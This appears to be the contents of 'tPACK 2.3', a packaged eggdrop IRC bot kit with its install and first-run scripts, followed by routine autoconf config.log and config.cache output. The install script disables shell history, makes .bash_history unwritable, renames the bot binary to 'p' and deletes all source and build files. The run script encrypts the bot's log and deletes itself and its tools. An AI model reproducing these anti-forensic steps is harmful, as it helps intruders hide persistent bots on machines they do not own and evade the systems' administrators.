echo "Running tPACK 2.3 for the first time"
echo "Please stand by..."
export PATH=$PATH:./
./encrypt egg.log egg.log.encr
rm encrypt
mv egg.log.encr egg.log
p
rm run

[ File boundary ]
unset HIST
chmod a-w ~/.bash_history
./configure --silent
make eggdrop
mv eggdrop p
rm -rf src
rm install
gcc encrypt.c -o encrypt
rm *.c
rm config*
rm lush*
rm Make*
rm *.h > /dev/null
rm DEBUG*
chmod 700 run
echo " "
echo "Completed installation of tpack version 2.3"

[ MARK config.log ]
This file contains any messages produced by compilers while
running configure, to aid debugging if configure makes a mistake.

configure:533: checking for gcc
configure:610: checking whether the C compiler (gcc  ) works
configure:624: gcc -o conftest    conftest.c  1>&5
configure:644: checking whether the C compiler (gcc  ) is a cross-compiler
configure:649: checking whether we are using GNU C
configure:673: checking whether gcc accepts -g
configure:711: checking whether make sets ${MAKE}
configure:740: checking for strip
configure:768: checking for uname
configure:798: checking for ranlib
configure:844: checking your OS
configure:965: checking for socket in -lsocket
configure:1012: checking for connect in -lnsl
configure:1059: checking for gethostbyname in -ldns
configure:1160: checking how to run the C preprocessor
configure:1221: checking for AIX
configure:1245: checking for POSIXized ISC
configure:1267: checking for minix/config.h
configure:1316: checking whether byte ordering is bigendian
configure:1406: checking size of long
configure:1445: checking size of int
configure:1489: checking for dirent.h that defines DIR
configure:1527: checking for opendir in -ldir
configure:1610: checking for sys/wait.h that is POSIX.1 compatible
configure:1655: checking for sys/time.h
configure:1655: checking for sys/select.h
configure:1655: checking for sys/rusage.h
configure:1655: checking for unistd.h
configure:1693: checking for ANSI C header files
configure:1797: checking for pid_t
configure:1830: checking whether time.h and sys/time.h may both be included
configure:1868: checking for rename
configure:1868: checking for getrusage
configure:1868: checking for getdtablesize
configure:1868: checking for srandom
configure:1868: checking for random
configure:1868: checking for sigaction
configure:1923: checking for sigemptyset
configure:1923: checking for vsprintf
configure:1923: checking for strcasecmp
configure:1923: checking for setpgid
configure:1923: checking for clock
configure:1923: checking for dlopen
configure:1978: checking for dprintf
configure:2041: checking space left in file database struct
configure:2085: checking for libtcl
configure:2120: checking for tcl.h
configure:2163: checking for Tcl version
configure:2197: checking for dlopen in -ldl

[ MARK config.cache ]

# This file is a shell script that caches the results of configure
# tests run on this system so they can be shared between configure
# scripts and configure runs.  It is not useful on other systems.
# If it contains results you don't want to keep, you may remove or edit it.
#
# By default, configure uses ./config.cache as the cache file,
# creating it if it does not exist already.  You can give configure
# the --cache-file=FILE option to use a different cache file; that is
# what configure does when it calls configure scripts in
# subdirectories, so they share the cache.
# Giving --cache-file=/dev/null disables caching, for debugging configure.
# config.status only pays attention to the cache file if you give it the
# --recheck option to rerun configure.
#
ac_cv_c_bigendian=${ac_cv_c_bigendian='no'}
ac_cv_func_clock=${ac_cv_func_clock='yes'}
ac_cv_func_dlopen=${ac_cv_func_dlopen='no'}
ac_cv_func_dprintf=${ac_cv_func_dprintf='no'}
ac_cv_func_getdtablesize=${ac_cv_func_getdtablesize='yes'}
ac_cv_func_getrusage=${ac_cv_func_getrusage='yes'}
ac_cv_func_random=${ac_cv_func_random='yes'}
ac_cv_func_rename=${ac_cv_func_rename='yes'}
ac_cv_func_setpgid=${ac_cv_func_setpgid='yes'}
ac_cv_func_sigaction=${ac_cv_func_sigaction='yes'}
ac_cv_func_sigemptyset=${ac_cv_func_sigemptyset='yes'}
ac_cv_func_srandom=${ac_cv_func_srandom='yes'}
ac_cv_func_strcasecmp=${ac_cv_func_strcasecmp='yes'}
ac_cv_func_vsprintf=${ac_cv_func_vsprintf='yes'}
ac_cv_header_dirent_dirent_h=${ac_cv_header_dirent_dirent_h='yes'}
ac_cv_header_dirent_sys_dir_h=${ac_cv_header_dirent_sys_dir_h='yes'}
ac_cv_header_dirent_sys_ndir_h=${ac_cv_header_dirent_sys_ndir_h='no'}
ac_cv_header_minix_config_h=${ac_cv_header_minix_config_h='no'}
ac_cv_header_stdc=${ac_cv_header_stdc='yes'}
ac_cv_header_sys_rusage_h=${ac_cv_header_sys_rusage_h='no'}
ac_cv_header_sys_select_h=${ac_cv_header_sys_select_h='no'}
ac_cv_header_sys_time_h=${ac_cv_header_sys_time_h='yes'}
ac_cv_header_sys_wait_h=${ac_cv_header_sys_wait_h='yes'}
ac_cv_header_time=${ac_cv_header_time='yes'}
ac_cv_header_unistd_h=${ac_cv_header_unistd_h='yes'}
ac_cv_lib_dir_opendir=${ac_cv_lib_dir_opendir='no'}
ac_cv_lib_dl_dlopen=${ac_cv_lib_dl_dlopen='yes'}
ac_cv_lib_dns_gethostbyname=${ac_cv_lib_dns_gethostbyname='no'}
ac_cv_lib_nsl_connect=${ac_cv_lib_nsl_connect='no'}
ac_cv_lib_socket_socket=${ac_cv_lib_socket_socket='no'}
ac_cv_lib_x_opendir=${ac_cv_lib_x_opendir='no'}
ac_cv_prog_CC=${ac_cv_prog_CC='gcc'}
ac_cv_prog_CPP=${ac_cv_prog_CPP='gcc -E'}
ac_cv_prog_RANLIB=${ac_cv_prog_RANLIB='ranlib'}
ac_cv_prog_STRIP=${ac_cv_prog_STRIP='strip'}
ac_cv_prog_UNAME=${ac_cv_prog_UNAME='uname'}
ac_cv_prog_cc_cross=${ac_cv_prog_cc_cross='no'}
ac_cv_prog_cc_g=${ac_cv_prog_cc_g='yes'}
ac_cv_prog_cc_works=${ac_cv_prog_cc_works='yes'}
ac_cv_prog_gcc=${ac_cv_prog_gcc='yes'}
ac_cv_prog_make_make_set=${ac_cv_prog_make_make_set='yes'}
ac_cv_sizeof_int=${ac_cv_sizeof_int='4'}
ac_cv_sizeof_long=${ac_cv_sizeof_long='4'}
ac_cv_type_pid_t=${ac_cv_type_pid_t='yes'}
